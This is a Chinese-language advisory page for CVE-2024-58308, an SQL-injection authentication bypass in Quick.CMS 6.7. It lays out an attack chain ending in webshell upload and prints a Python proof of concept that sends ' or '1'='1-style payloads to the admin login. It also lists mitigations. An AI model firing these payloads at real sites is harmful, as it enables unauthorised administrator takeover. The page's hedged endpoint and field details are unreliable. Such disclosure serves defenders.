CVE-2024-58308 Quick.CMS 6.7 SQL注入登录绕过漏洞

漏洞信息

漏洞编号

CVE-2024-58308

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Quick.CMS

漏洞概述

CVE-2024-58308是OpenSolution Quick.CMS 6.7中的一个严重安全漏洞，CVSS评分高达9.8分（满分10分）。该漏洞存在于登录认证模块中，由于对用户输入的登录凭据缺乏充分的过滤和参数化查询，攻击者可以通过在登录表单中注入恶意的SQL payloads来绕过身份验证。成功利用此漏洞的攻击者可以在无需任何有效凭证的情况下获取系统的管理员访问权限，从而完全控制受影响的CMS系统。由于该漏洞影响所有未修补的Quick.CMS 6.7实例，且利用难度低、无需特殊权限或用户交互，因此被评定为严重威胁等级。建议所有使用Quick.CMS 6.7的用户立即采取修复措施。

技术细节

Quick.CMS 6.7的登录认证功能存在SQL注入漏洞。漏洞位于admin.php或类似的登录处理脚本中，当处理用户提交的登录表单数据时，程序直接将用户输入拼接到SQL查询语句中而未进行适当的输入验证和参数化查询。攻击者可以在用户名或密码字段中注入SQL payloads，例如使用' or '1'='1作为用户名或密码，构造的恶意输入会改变原始SQL查询的逻辑结构，使其始终返回真值，从而绕过密码验证机制。攻击者利用这种认证绕过技术可以以管理员身份登录后台管理系统，进而执行任意代码、上传webshell或窃取敏感数据。漏洞的利用不需要任何预先身份认证，且可以通过自动化工具批量扫描和利用。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的Quick.CMS版本，确认版本为6.7或更早版本

STEP 2

步骤2

定位入口：访问管理员登录页面（通常为/admin.php或/admin/login.php）

STEP 3

步骤3

构造Payload：在登录表单的用户名或密码字段中注入SQL注入载荷，如' or '1'='1

STEP 4

步骤4

发送请求：向登录端点发送包含恶意SQL载荷的POST请求

STEP 5

步骤5

绕过认证：SQL载荷改变查询逻辑使认证条件永远为真，服务器返回管理员会话

STEP 6

步骤6

持久化控制：以管理员身份登录后台，可上传webshell、执行任意命令或窃取数据库数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2024-58308 PoC - Quick.CMS 6.7 SQL Injection Authentication Bypass
# Target: Quick.CMS 6.7 admin login endpoint

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/Quick.CMS/"
login_url = target_url.rstrip('/') + "/admin.php"

# SQL injection payloads to bypass authentication
payloads = [
    "' or '1'='1",
    "admin' OR '1'='1",
    "' OR 1=1--",
    "' OR 'a'='a",
]

def exploit_sqli(url, payload):
    """Send malicious payload to login form"""
    data = {
        'sLogin': payload,
        'sPassword': payload,
        'bLogin': '1'
    }
    try:
        response = requests.post(url, data=data, timeout=10, allow_redirects=False)
        # Check for successful login indicators
        if response.status_code in [200, 302]:
            if 'admin' in response.text.lower() or 'dashboard' in response.text.lower():
                return True
            if 'location' in response.headers and 'admin' in str(response.headers.get('location', '')):
                return True
        return False
    except requests.RequestException:
        return False

def main():
    print(f"[*] CVE-2024-58308 Quick.CMS SQL Injection PoC")
    print(f"[*] Target: {login_url}\n")
    
    for payload in payloads:
        print(f"[*] Testing payload: {payload}")
        if exploit_sqli(login_url, payload):
            print(f"[!] VULNERABLE! Authentication bypass successful with: {payload}")
            return
    print("[*] No payloads succeeded")

if __name__ == "__main__":
    main()

影响范围

Quick.CMS 6.7及更早版本

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 在Web服务器层面配置SQL注入防护规则；2) 临时关闭管理后台的公开访问，仅允许通过VPN或特定IP段访问；3) 启用双因素认证增强登录安全；4) 监控日志中的异常登录行为和可疑SQL语句；5) 考虑使用ModSecurity等WAF产品进行临时防护。